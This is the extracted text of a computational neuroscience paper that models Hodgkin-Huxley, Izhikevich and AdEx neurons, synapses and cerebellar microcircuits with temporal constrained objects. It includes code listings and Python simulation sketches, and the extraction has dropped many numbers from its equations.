are modelled through a rich set of constraints. the underlying computational engine performs logical inference and constraint satisfaction to enforce the behaviour automatically while each object is created. one of the most useful features of temporal constrained objects for modelling temporal (or dynamic) behaviour is the series variable, declared as: series type variable_name [initialization]; the series variable takes on an unbounded sequence of values over time, and temporal constraints are defined in terms of past and future values of the series variable. for every series variable v, the expression�v refers to the immediate previous value of v and v� to the next value. these operators can be juxtaposed (for example,��v and v��) to refer to successive values of v in the past or future. a series variable may also be initialized by explicitly assigning values at specific time points. an example of an alternating-current (ac) circuit illustrates the basic constructs of the language (fig. ). the series attributes, voltage (v) and current (i), in the abstract component class holds the sequence of values at different instance of time. the source class generates the input voltage for the circuit, which varies sinusoidal with time. the classes resistor and capacitor inherit voltage and current from the component class. the constraints in each class define the laws of circuit elements: the resistor class nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ abstract class component{ attributes series real v, i; constraints v< > = . ; i< > = . 
} class source extends component{ constraints sin(time, v); constructors source(){} } class resistor extends component{ attributes real r; constraints v = i * r; constructors resistor(r ) { r = r ; } } class capacitor extends component{ attributes real c; constraints i = c * (v -‘v); constructors capacitor(c ) { c = c ; } } class series_comp extends component{ attributes component [] sc; constraint forall c in sc: c.i = i; (sum x in sc: x.v) = v; constructors series_comp(a) { sc = a; } } class parallel_comp extends component{ attributes component[] pc; constraints forall x in pc: x.v = v; (sum x in pc: x.i) = i; constructors parallel_comp(b) {pc = b;} } class sample_circuit { attributes source ac;resistor r ,r ; capacitor c; series_comp s; parallel_comp p; component[]ser; component[]par; constructors sample_circuit(){ r = new resistor( . ); r = new resistor( . ); c = new capacitor( . ); ser[ ] = r ;ser[ ] = c; s = new series_comp(ser); ac = new source(); par[ ]=s; par[ ]=ac; par[ ]=r ; p = new parallel_comp(par); }} figure temporal constrained object representation of ac circuit. full-size doi: . /peerj-cs. /fig- incorporates ohm’s law for resistance (eq. ( )); and the capacitor class incorporates ampere’s law for capacitance (eq. ( )). v ¼ ir ( ) i ¼ c dv dt ( ) the differential equation (eq. ( )) is treated as difference equations in the capacitor class, i.e. the rate of change of voltage can be approximated by change in voltage in one unit of time. the parallel_comp and series_comp classes represent the two different nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ways of combining the components of the ac circuit. (of course, non-series parallel circuits can also be defined, but the example in fig. pertains only to series-parallel circuits.) the constraints describe the resultant voltage and current for both kinds of circuits. for example, in class parallel_comp, the quantified constraint forall enforces that the voltage across every component in the parallel circuit is the same and equal to the voltage across the parallel circuit; and, the summation constraint sums up the currents through each component of the parallel circuit and equates it to the current through the parallel circuit. the class sample_circuit builds a series component with a resistor and capacitor and a parallel component consisting of the series component, a sinusoidal voltage source and a single resistor. in order to understand the execution of a tcob program, tcob provides a built-in variable time, which represents the current time and is automatically incremented by one unit to record the progression of time. the default initial value for time is equal to one unless a different value is specified by the user. the user may adopt any other discrete granularity for time by multiplying with a suitable scaling factor, e.g. mytime = . � time. we use the example of an on-off controller (fig. ) to illustrate the basic concepts of conditional constraints in the tcob. this is a simplified version of traffic light example from a previous paper (kannimoola, jayaraman & achuthan ( )). the variable c is declared using series keyword to model transitioning from on/off state in each time instance, specified by the conditional constraint symbol -->. when time = , the value of c = on since this is the initial value of c as given in the constructor. at this time, the value of c�, i.e. 
the value of c at the next time step, is set to off based on the first constraint in the program. in a similar manner, the second constraint determines the values of c for the off-on transition.

class controller {
  attributes
    series string c;
  constraints
    c = on  --> c` = off;
    c = off --> c` = on;
  constructor controller() { c< > = on; }
}

figure: simple controller using conditional constraints.

in this implementation, the tcob programming environment consists of a compiler which translates the class definitions into equivalent predicates in swi-prolog, which provides support for constraint-solving through its libraries. a more detailed description of the language is given in kannimoola et al. ( ).

electrical equivalent circuit of neurons
a single neuron is often conceptualised using the biophysics of a neuronal membrane, represented by resistance-capacitance (rc) low-pass filtering properties, wherein the lipid bi-layer of the neuron is modelled as a capacitance (c), the voltage-gated ion channels as electrical conductances (g) and the electrical gradient as reversal potentials. basic voltage and current laws (ohm's and kirchhoff's laws) are then employed to calculate the voltage across the membrane of the neuron.

the cell membrane acts as a diffusion barrier and an insulator to the movement of ions. the lipid bi-layer of the membrane accumulates charge over its surface, with the intracellular and extracellular solutions acting as the conducting plates separated by the non-conducting membrane. the capacitive current $I_C$ thus formed is

$I_C = C \dfrac{dV}{dt}$  ( )

where $C$ is the capacitance and $V$ is the voltage across the membrane. ions flow into and out of the cell through ion channels. the flow of ions through these channels leads to a resistive current into the neuron, which is represented using ohm's law:

$I_{ion} = g_{ion} V$  ( )

where $g_{ion}$ is the conductance of the ion across the membrane and $I_{ion}$ is the ionic current. when the electromotive force acting on the ions (the battery of the circuit) is included, the ionic current can be represented as

$I_{ion} = g_{ion}\,(V - E_{ion})$  ( )

the total current flowing across the membrane is the sum of the capacitive and ionic currents:

$I_{total} = I_C + I_{ion}$  ( )

at steady state, the membrane voltage remains constant, which means that the net current into the neuron plus the net current out of the neuron must equal zero:

$I_{total} = I_C + I_{ion} = 0$  ( )

when an input current $I_{ext}$ is injected into the cell, it further charges the capacitor and the current leaks through the membrane:

$I_{ext} = C \dfrac{dV}{dt} + I_{ion}$  ( )

a larger number of open ion channels in the membrane decreases the resistance of the membrane due to the increased ionic flow across it, which corresponds to an increase in membrane conductance. ionic current flow through a neuron with sodium, potassium and leak channels can thus be modelled as

$I_{ext} = C \dfrac{dV}{dt} + g_{Na}(V - E_{Na}) + g_{K}(V - E_{K}) + g_{L}(V - E_{L})$  ( )

passive electrical properties persist in the neuron if the input is a sub-threshold or hyperpolarizing current. neurons communicate with each other using stereotyped electrical signals called action potentials, or spikes. the generation of an action potential in the neuron can be explained by modelling the activation of ion channels.
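to make the link between the continuous current-balance equation above and the discrete-time constraints used later in the paper concrete, the following is a minimal python sketch (an illustration only, not part of the tcob implementation) that integrates a leak-only version of the membrane equation with a forward-euler step, the same euler-style approximation the tcob models rely on; all parameter values are assumptions chosen for readability.

# forward-euler sketch of the passive membrane equation
# dV/dt = (I_ext - g_L*(V - E_L)) / C, leak channel only (illustrative values)
C = 1.0        # membrane capacitance (assumed units)
g_L = 0.1      # leak conductance (assumed)
E_L = -65.0    # leak reversal potential in mV (assumed)
I_ext = 1.5    # injected current (assumed)
dt = 0.1       # time step in ms (assumed)
V = E_L        # start at rest
for step in range(1000):                  # 100 ms of simulated time
    I_ion = g_L * (V - E_L)               # ionic (leak) current
    V = V + dt * (I_ext - I_ion) / C      # the relation tcob states as a constraint between V and `V
print(round(V, 2))                        # settles toward E_L + I_ext/g_L = -50 mV

written this way, each pass through the loop plays the role of one tick of the tcob time variable, and the update line corresponds to a difference constraint relating the current and previous values of the membrane voltage.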
detailed conductance-based models like the hodgkin–huxley (hh) model and simpler phenomenological models like the izhikevich model and the adaptive exponential integrate-and-fire model were used in this study to explain the spiking mechanisms of neurons.

methods
in this paper, we used temporal constrained objects to model the time-varying dynamics of a neural circuit as exhibited by the electrical activity of neurons and synapses. in modelling studies, the elemental features of a neural system are abstracted into a conceptual model and formalized in mathematical form. a working embodiment of the neural dynamics is then created as a computational model, which is used to test and examine the abstraction. chemical and electrical phenomena of neural systems were then simulated from these mathematical representations (fig. ). temporal constrained objects allowed a direct implementation of the circuit model of a neuronal system. the initial focus was on modelling the component-based structure of the neural system by identifying the components, their functions and their parameters. the main constituent of the neural system, the neuron, was modelled in two different formulations: ( ) using voltage functions which are continuous over a time evolution (as in a hh model, described in 'modelling neurons using continuous time hh mechanisms'); and ( ) using voltage reset functions which show piecewise state changes (as in adex and izhikevich models, described in 'reconstructing neurons using voltage reset models').

figure: computational modelling of neurons. panels: rc circuit equivalent model, mathematical model and computational model; the computational-model panel lists the constraints ina = m*m*m*h*gna*(vm-ena); ik = n*n*n*n*gk*(vm-ek); ileak = gl*(vm-el); iion = ina + ik + il; vm = `vm + ((iext - `iion)/c). it is a common practice to abstract a neuron as an rc circuit to describe the electrical properties of the neuron. current flow in the neuron was mathematically modelled using this equivalent model. in the temporal constrained object approach, a neuron was represented as an abstract data type with attributes (state information) and constraints (rules of behaviour).

'modelling synaptic dynamics' presents the modelling of synaptic interactions between neurons using continuous functions of time. in modelling neurons and synapses with temporal constrained objects, the biophysical mechanisms (abstracted as mathematical formulations in the models) were represented as constraints of the class. continuous state changes of variables were represented using simple constraints, while voltage reset functions were represented using conditional constraints. once the fundamental components of a neural network were modelled, the interactions between these components in a network ('modelling neuronal interactions' and 'modelling cerebellar microcircuits') were incorporated. the biological fidelity of the models was tested to validate whether the models reproduce experimental outcomes.

modelling neurons using continuous time hodgkin–huxley mechanisms
hodgkin–huxley equations (hodgkin & huxley, ) model the biophysical characteristics of a neuronal membrane in detail.
this model exhibits various neuronal behaviour by the calculation of ionic current in their mathematical notation. a set of first-order differential equations specify the dynamics of membrane voltages and ion channels of the neurons. according to this model, the ionic current flow in eq. ( ) has been rephrased as, iext ¼ c dv dt þ gnamaxm hðv � enaÞ þ gkmaxn ðv � ekÞ þ glðv � elÞ ( a) where the ionic conductance was modelled as voltage dependent quantity with the flow of ions regulated by physical gates which are either in their open state or in closed state. in ( a), gnamax and gkmax are the maximum conductance of na + and k + ions, m and h are the probabilities of the fast and slow subunits of na channel being open and closed states and n is the probability of the subunit of a k channel being open. dynamical properties of these gating variables are also represented using differential eqs. ( b– d). dh dt ¼ ahð � hÞ � bhh ( b) dn dt ¼ anð � nÞ � bnn ( c) dm dt ¼ amð � mÞ � bmm; ( d) hodgkin–huxley model represents a system of four differential eqs. ( a to d) which are coupled via voltage vof the membrane. in the standard formulation of hh model, the rate constants a and b of the ionic gates are empirically determined as a function of membrane voltage v as am ¼ ð : � : vÞ e : � : v � ; bm ¼ e �v ( e) an ¼ ð : � : vÞ e � : v � ; bn ¼ : e �v ( f) nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ah ¼ : e� v ; bh ¼ e � : v þ ( g) in temporal constrained object implementation of the hh model, the properties of neurons, such as maximum channel conductance, reversal potential, or capacitance of the cell were represented as attributes of the class. dynamically changing membrane voltage, the gating variables and the input current values were represented as series variables. the mathematical equations representing the relation between these variables were represented using quantified constraints and their initial values were represented using simple constraints (fig. ). objects of the class can be created using creational constraints. the membrane potential in the hh model varies as a continuous function over time and the numerical integration require that the values should be specified over a time evolution. in traditional object-oriented languages, the behaviour of the model can be enforced using member functions in the class which are to be explicitly called during execution. in the temporal constrained object based formulation, the differential equations are converted into difference equations and the simulation evaluated the constraint at every time step. this facilitates a modular representation, where the model behaviour is implicitly enforced during constraint satisfaction. reconstructing neurons using voltage reset models detailed conductance-based models (as in ‘modelling neurons using continuous time hodgkin–huxley mechanisms’) explain the behaviour of the neurons at a mechanistic level. since such models have higher computational costs for complex circuits, we adopted two mathematical abstractions: izhikevich model and adaptive exponential integrate and fire model (izhikevich, ; brette & gerstner, ). class neuron { … constraints %the voltage equation (vm-`vm)=dt*(istim-((gna*pow(`m, )*`h*(`vm-ena))+(gk* pow(`n, )*(`vm-ek))+(gleak*(`vm-eleak))))/c; %m,n,h dynamics (m-`m)=dt*(( -`m)*(( . *(-vm + ))/(pow(e,(-vm+ )/ )- )) - * pow(e,(-vm) / )*`m); (n-`n)=dt*(( -`n)*((( . / )*(-vm+ ))/(pow(e,(-vm+ )/ )- )) - . 
*pow(e,(-vm)/ )*`n); (h-`h)=dt*(( -h)*(( . / )*pow(e,(-vm)/ ))-( /(pow(e,(vm+ )/ ) + ))*`h); time < -->istim = ; %applying input current time >= -->istim = ; … } figure representation of hodgkin–huxley model as a tcob class. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the izhikevich model is expressed as: dv dt ¼ : v þ v þ � u þ i ( a) du dt ¼ a bv � uð Þ ( b) if u > mv; v ¼ c; u ¼ u þ d ( c) in the two-dimensional set of ordinary differential equations of the izhikevich model (eqs. ( a)–( c)), v is the membrane potential, u is the recovery variable, a represents the time scale of this recovery variable, b represents the sensitivity of u towards sub-threshold fluctuations in v, c represents the after spike reset value of v, d represents the after spike reset value of u. this implementation of a canonical model includes a nonlinear term v , and has been shown to reproduce multiple behaviours of neurons such as spiking, busting, adaptation, resonance and mixed mode behaviours. the adaptive-exponential integrate and fire (adex) model is expressed as: dv dt ¼ gl � v � elð Þ þ gl � t � exp v�vt t � � � isyn � w c ( a) �w dw dt ¼ a � v � elð Þ � w ( b) if v > mv; v ¼ vr; w ¼ w þ b ( c) this model (eqs. ( a)–( c)) represents spiking dynamics (eq. ( a)) and the adaptation in the firing rate of the neuron (eq. ( b)) with v representing the membrane voltage, c is the membrane capacitance, gl is the leak conductance, el is the resting potential, �t is the slope factor, vt is the threshold potential, vr is the reset potential, isyn is the synaptic current, �w is the adaptation time constant, a is the level of sub-threshold adaptation and b represents spike triggered adaptation. the model implementation follows the dynamics of a rc circuit until v reaches vt. the neuron is presumed to fire on crossing this threshold voltage and the downswing of the action potential is replaced by a reset of membrane potential v to a lower value, vr. since adex and izhikevich models do not contain continuous-time equations, the membrane dynamics and its reset mechanisms in tcob models were represented using conditional constraints. for example, fig. shows the class definition for an izhikevich model. in the model, the membrane voltage does not change as a continuous function of time. the auxiliary reset of the membrane voltage v and the membrane recovery variable u, required a discontinuous change during constraint solving, the value being independent from the value of the variable in the previous time step. this change was controlled using the value of a series variable ‘flag,’ and using conditional constraints. it should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time. since the membrane potential vm diverges towards infinity at a particular step and vm need to be reset before nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this step, another series variable varray was used to store a finite maximum upswing value for vm. adex type neurons were also modelled similarly (see supplementary material for the complete class definition). modelling synaptic dynamics the neurotransmitter release and intake mechanisms of the pre- and post-synaptic neurons were modelled using synaptic conductance gsyn(t). 
the changes were represented as continuous-time equations which represented the fluctuations in synaptic conductance changes attributed to current flow (destexhe, mainen & sejnowski, ). the synaptic currents were calculated as the difference between reversal potential and membrane potential (eq. ( )). isyn tð Þ ¼ gsyn tð Þ v � esyn � � ( ) where gsyn(t) = gmax . g(t), and gmax is the maximal conductance of the synapse, g(t) is the time course of synaptic channel conductance, isyn(t) is the synaptic current, esyn is the synaptic reversal potential and v is the membrane voltage. the time course of channel conductance g(t) was modelled using different mathematical formulations (roth & van rossum, ). for example, reconstructing exponential synapses biophysically included an instantaneous rise of gsyn(t) from to gmax at time t (the time at which spike occurs) followed by an exponential term specifying the decay, with a time constant � (eq. ( )). class neuron { attributes series real vm, varray, u; series int flag; real a,b,c,d; real i,dt; constraints flag= -->(vm-`vm)/dt=(( . / )*`vm*`vm+ *`vm+ -`u+i); flag= -->(u-`u)/dt=a*(b*`vm-`u); vm > --> (vm` = c) ; vm > --> (u`= u + d) ; vm > --> flag`= ; vm <= --> flag`= ; flag = --> varray=vm; flag = --> varray = . ; constructors neuron() { a = . ; b = . ; c = - . ; d = . ; vm< > = - . ; u< > = b* vm< >; flag< > = ; i = . , dt= . ; } } figure izhikevich model represented as a tcob class. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gsyn tð Þ ¼ gmax:e� t�t �ð Þ ( ) the exponential synapse model approximates synaptic dynamics with the rising phase shorter than the decay phase. a single-exponential function is a reliable approximation for several synapses where the channels instantaneously transit from closed to open states. alpha synaptic models have been used for synapses with finite duration rising phases (eq. ( )) while in double-exponential synapse model, both rise time and decay time of the synapses were modelled separately (eqs. ( a)–( c)). gsyn tð Þ ¼ gmax: t � t � :e � t�t ð Þ � ( ) gsyn tð Þ ¼ gmax : fnorm : e � t�t �decay � � � e� t�t �rise � � ! ( a) fnorm ¼ e � tpeak�t �rise � � þ e� tpeak�t �decay � � ! : ( b) tpeak ¼ t þ �decay : �rise �decay � �rise : ln �decay �rise ( c) in temporal constrained object based implementation, synapses were also modelled using classes. continuous conductance changes of the synapses were represented as constraints in each constituent class. conditional constraints were used to represent the conductance changes before and after the stimulus onset. synaptic currents were calculated by automatically evaluating the constraints in each class. modelling neuronal interactions behaviour of sub-cellular or cellular components in biological neural circuits is not entirely sufficient to understand network function, since the dynamics and complexity of the neural systems are known to be nonlinear (koch & segev, ) (also see supplementary material, section ). in the bottom-up modelling of brain circuits, challenges remain in assessing how the properties of individual neurons combine together to produce the emergent behaviour at the circuit and translational levels. in designing large circuit models, new rules of interaction may emerge from underlying principles. 
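before turning to how these components are wired together, a short numerical reference for the synaptic wave-forms defined above may be useful. the python sketch below evaluates a double-exponential conductance and the corresponding synaptic current at a fixed membrane voltage; it is an illustration only, and the peak conductance, time constants, spike time and voltage are assumed values rather than the ones used in the tcob models (the normalisation factor is written so that the peak conductance equals g_max).

import math

g_max = 1.0            # peak conductance (assumed)
tau_rise = 1.0         # rise time constant in ms (assumed)
tau_decay = 5.0        # decay time constant in ms (assumed)
t0 = 10.0              # presynaptic spike time in ms (assumed)
E_syn, V = 0.0, -65.0  # reversal potential and a fixed membrane voltage (assumed)

# time of the conductance peak, as in the double-exponential formulation
t_peak = t0 + (tau_decay * tau_rise / (tau_decay - tau_rise)) * math.log(tau_decay / tau_rise)
f_norm = 1.0 / (math.exp(-(t_peak - t0) / tau_decay) - math.exp(-(t_peak - t0) / tau_rise))

def g_syn(t):
    # conductance is zero before the spike, then rises and decays with separate time constants
    if t < t0:
        return 0.0
    return g_max * f_norm * (math.exp(-(t - t0) / tau_decay) - math.exp(-(t - t0) / tau_rise))

for t in (t0, t_peak, 30.0):
    i_syn = g_syn(t) * (V - E_syn)   # synaptic current at this instant
    print(round(t, 2), round(g_syn(t), 3), round(i_syn, 3))

the three quantities printed (time, conductance and resulting current) are essentially what the tcob synapse classes compute through their constraints, so a trace produced by the declarative model can be compared against this kind of reference point by point.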
here, tcob like frameworks offer a natural way to express the interactions by identifying and implementing the constraints. a network of neurons was modelled in tcob, where each neuron in the network was simulated with different number of excitatory and inhibitory synaptic inputs. excitatory synapses were modelled using ampa and nmda synaptic dynamics where inhibitory synapses were modelled using gaba synaptic dynamics (mccormick, wang & huguenard, ). all neurons were modelled as complex objects, i.e. consisting of other constrained objects with its own internal attributes and constraints (fig. ). nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the class neuron creates instances of the classes adex_neuron to include the neuron model and the classes ampa, gaba and nmda to model the synapses. fig. represents the tcob model for uml class diagram in fig. . the modelled neuron receives synaptic inputs through one ampa, one nmda and one gaba synapse. the total input current (iin) to a neuron was set as the sum of its synaptic currents using the constraint: n.iin =am.iampa+ga.igaba+nm.inmda; this constraint automatically enforces the relation between change in membrane voltage of the neuron and the synaptic inputs it receives. a cluster of such neurons were simulated by creating an array of tcob objects. constraint solving and evaluation of these objects utilized the implicit parallelization of constraints from the constraint store (hutchison & mitchell, ). modelling cerebellar microcircuits as a test of viability to use temporal constrained object based models for neural modelling, firing patterns of several types of known neurons of the cerebellum were reconstructed as in a previous study (nair et al., ). single neurons of wistar rat cerebellum were modelled and attempted mathematical reconstruction of small scale cerebellar microcircuits. associated with motor tasks and motor adaptation (kandel et al., ), cerebellum receives inputs from major motor regions of the brain and gives feedback to these sources. the significantly large number of granule cells in the input layer of the cerebellum distinguishes cerebellum from the rest of the nervous system. the computational significance of these neurons has been a topic of interest and granule cell has received recent attention in computational modelling studies attributed to the numerosity, its electronically compact structure, simpler dendritic arbor and the signal recoding computations that it performs on neuron <<attributes>> <<constraints>> <<constructor>> ..* ..* ..* ..* ..* ..* adex_neuron <<attributes>> <<constraints>> <<constructor>> nmda <<attributes>> <<constraints>> <<constructor>> gaba <<attributes>> <<constraints>> <<constructor>> ampa <<attributes>> <<constraints>> <<constructor>> figure uml representation of tcob implementation of a neuron with synapses. a single neuron is represented as an aggregate of a neuron model and model synapses. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the inputs that it receive from different brain regions (diwakar et al., ; solinas, nieus & d’angelo, ; d’angelo, ). 
to reconstruct all the computational elements of the cerebellar circuitry and their convergence-divergence ratios, computationally effective methods may be needed to model circuit functions (markram, ). the input to cerebellum is through mossy fibres innervating the granule and golgi neurons (fig. a). while golgi neurons inhibit granule neurons via a feed-forward inhibition, the axons of granule cells extend as parallel fibres and excite purkinje neurons. as in experiments (diwakar et al., ), modelled granule neuron receives on an average four excitatory and four inhibitory connections. in this paper, a small scale granular layer circuitry with purkinje neurons was modelled with temporal constrained objects (fig. b) using classes granule, golgi, purkinje, mossyfiber and parallelfiber respectively. a model neuron inherited from the neuron class and was represented using adex dynamics. excitatory synapses were modelled using ampa kinetics and inhibitory synapses were modelled using gaba kinetics. in the implementation, the microcircuit consisted of an aggregation of the neurons and synapses (fig. ). the temporal constrained object model of the microcircuit allowed computing the spike- train responses of constituent neurons. the class microcircuit (fig. ) modelled the rat granular layer neural circuit (also see uml flow diagram in fig. ). in the model, granule and golgi neurons received mossy fibre inputs and the change in membrane potential of golgi and purkinje neurons were automatically computed by satisfying internal and interface constraints. initial inputs to granule and golgi neurons were provided by mossy fibre. this was represented in the constraints: goc.mfinput = mf.input; grc.mfinput = mf.input; the variable spiketrain holds the response train of each neuron, generated as a result of model evaluation. class neuron { attributes adex_neuron n; ampa am; gaba ga;nmda nm; constraints am.vm = n.vm; ga.vm = n.vm; nm.vm = n.vm; n.iin =am.iampa+ga.igaba+nm.inmda; constructor neuron(){ n=new adex_neuron( . , . ,- . , . ,- . , . , . , . , . ,- . ); am = new ampa(); ga = new gaba(); nm = new nmda(); } } figure tcob representation of neuron with synapse. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the golgi neuron output is applied to granule neuron using the constraints goc.output = goc.spiketrain; grc.gocinput = goc.output such that the granule neuron receives both excitatory input through mossy fibres and inhibitory input through golgi neurons. mossy fiber inputs from various brain regions golgi cell granule cell purkinje cell basket cell stellate cell climbing fiber input from io parallel fiber output to dcn a mossy fiber + + - - + golgi cell granule cell purkinje cell parallel fiber input output b figure modelling sample cerebellar microcircuits. (a) circuits in the cerebellum: cartoon repre- sentation of interconnections in the input-output pathway of the cerebellum. (b) cellular components of the microcircuit reconstructed: granule neuron, golgi neuron and purkinje neuron, receiving inputs through excitatory (+) and inhibitory (-) synapses. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ in the next level of processing, output from the granular layer is applied as the parallel fibre input into purkinje neurons using the constraints: grc.output = grc.spiketrain; pf.input = grc.output; pc.grcinput = pf.input; ..* ..* ..* ..* ..* ..* neuron <<attributes>> <<constraints>> <<constructor>> granule <<attributes>> <<constraints>> <<constructor>> golgi <<attributes>> <<constraints>> <<constructor>> purkinje <<attributes>> <<constraints>> <<constructor>> mossyfiber <<attributes>> <<constraints>> <<constructor>> parallelfiber <<attributes>> <<constraints>> <<constructor>> microcircuit <<attributes>> <<constraints>> <<constructor>> figure uml representation of temporal constrained object implementation of the microcircuit. granule, golgi and purkinje classes inherit from the class neuron. the classes mossy fiber and parallel fiber represented inputs to the neurons. in the implementation, the microcircuit consisted of an aggregation of the neurons and synapses. full-size doi: . /peerj-cs. /fig- class microcircuit { attributes mossyfiber mf; parallelfiber pf; granule grc; golgi goc; purkinje pc; constraints goc.mfinput = mf.input; grc.mfinput = mf.input; goc.output = goc.spiketrain; grc.gocinput = goc.output; grc.output = grc.spiketrain; pf.input = grc.output; pc.grcinput = pf.input; pc.output = pc.spiketrain; constructor microcircuit(){ ... } } figure representation of cerebellar microcircuit. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after evaluating the constraints of purkinje neuron, the entire output from the microcircuit was made available as: pc.output = pc.spiketrain; the constraints highlighted above can be viewed as the interface constraints of the models while each object in the microcircuit class has its own internal constraint to be satisfied while object creation. the model evaluations were performed automatically while the constructor of the microcircuit class is called. the entire code with the programming environment is available freely at https://github. com/compneuro/tcob_neuron. results temporal spike train firing patterns in neurons to demonstrate the effectiveness of constraint evaluation results against state-of-the-art simulations, the output of tcob models were recorded using tcob predicates. using - v ol ta ge (m v ) i v a - - dc time(ms) time(ms) time(ms) v ol ta ge (m v ) - - v ol ta ge (m v ) - v o lt a g e (m v ) - v o lt a g e (m v ) fe time(ms) time(ms) . i = pa time(ms) m n h b figure modelling the spiking mechanisms of neurons. simulation times are in millisecond scale matching slice recordings (hodgkin & huxley, ). the initial resting membrane potential was kept at - mv. (a) firing of hh neuron for current stimuli of various amplitudes. the implementation showed repetitive firing behaviour for input current of six pa onwards. firing rate of the neuron depended on the intensity of the injected current. firing rate increased as the depolarizing current increases. (b) channel gating parameters m, n, h of the model for input current of three pa. m changed faster than h or n. during hyperpolarization m, h and n returned towards resting values. (c) regular spiking behaviour shown by most typical neurons in the cortex reproduced using izhikevich model. 
(d) chattering: stereotypical bursts of closely spaced spikes reproduced using izhikevich model. (e) tonic spiking with sharp reset showed the behaviour of certain constantly active neurons, modelled using adex equations. (f) adaptation behaviour of certain neurons showing the reduction in firing frequency, modelled using adex equations. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/compneuro/tcob_neuron https://github.com/compneuro/tcob_neuron http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ standard values for model parameters, voltage plots of continuous-time hh models and voltage-reset models, izhikevich and adex, were reproduced (naud et al., ). in hh models, computationally reconstructed action potential peaked at a voltage of + mv, followed by hyper-polarization following which the resting potential was re-established (hodgkin & huxley, ) (fig. a). as in experiments, when the injected current in the model was insufficient to depolarize the membrane, no action potential was generated. in our implementation, a minimum threshold non-zero current was observed for which the hh model demonstrated repeated firing, and the firing frequency increased with the increase in intensity of the input. the plot of hh gating variables depicted the behaviour of channel activation and inactivation (fig. b). izhikevich and adex models were also stimulated with input currents to reproduce various firing behaviour of different neuron types in the brain (figs. c– f). the neuron and synapse models implemented using temporal constrained objects were parameter optimized to reproduce the firing behaviour of different neuron types present in the cerebellum (medini et al., ; nair et al., ) under current clamp experiments (d’angelo et al., ; bezzi et al., ), during in vitro behaviour (as seen in brain slices) and during in vivo behaviour (as seen in anaesthetized rats) for inputs through mossy fibres (diwakar et al., ). single spike inputs were applied through the synapses to model in vitro inputs while small burst inputs (e.g., five spikes per burst) was used to model in vivo inputs (roggeri et al., ). the modelled responses of granule, golgi and purkinje neurons using adex neuron models for pa input current are shown in figs. a– c (medini et al., ). the modelled responses of granule neurons during in vitro inputs and in vivo inputs are shown in figs. d and e. cb - - - - - - - - granule vo lta ge (m v) - - - - - - - golgi vo lta ge (m v) - - - - - - - purkinje vo lta ge (m v) a - - membrane voltage v ol ta ge ( m v ) time (ms) d - - membrane voltage time (ms) v ol ta ge ( m v ) e figure modelling cerebellar neurons. (a–c) granule, golgi and purkinje neuron responses for current clamp protocol (i = pa), modelled using adex equations. (d and e) response of granule neurons for in vitro like (left) and in vivo like (right) spike inputs. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ synaptic dynamics resolved using tcob using a conductance-based synaptic mechanism, neurons were excited synaptically using pre-synaptic spike trains. alpha function reproduced the post-synaptic conductance of synapses with a finite rise time (fig. a). instantaneous rise and exponential decay of membrane potential were modelled using single exponential synapses (fig. b). 
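for readers who want to reproduce the reference firing patterns outside the tcob environment, the following is a minimal imperative python sketch of the izhikevich update that the tcob class expresses through constraints and a conditional reset; the parameter set (a, b, c, d) is the standard regular-spiking set for the izhikevich model, while the input current, time step and simulated duration are assumptions.

a, b, c, d = 0.02, 0.2, -65.0, 8.0    # regular-spiking parameters
dt = 0.25                             # time step in ms (assumed)
I = 10.0                              # injected current (assumed)
v, u = -65.0, 0.2 * -65.0             # start at rest, u initialised to b*v
spike_times = []
for step in range(4000):              # 1000 ms of simulated time
    v += dt * (0.04 * v * v + 5.0 * v + 140.0 - u + I)
    u += dt * a * (b * v - u)
    if v >= 30.0:                     # spike: apply the auxiliary reset, as the conditional constraints do
        spike_times.append(step * dt)
        v, u = c, u + d
print(len(spike_times), "spikes in 1 s")

the loop plays the role of the tcob time variable, the two update lines correspond to the difference constraints on v and u, and the if-branch corresponds to the conditional constraints guarded by the series variable flag in the izhikevich class shown earlier.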
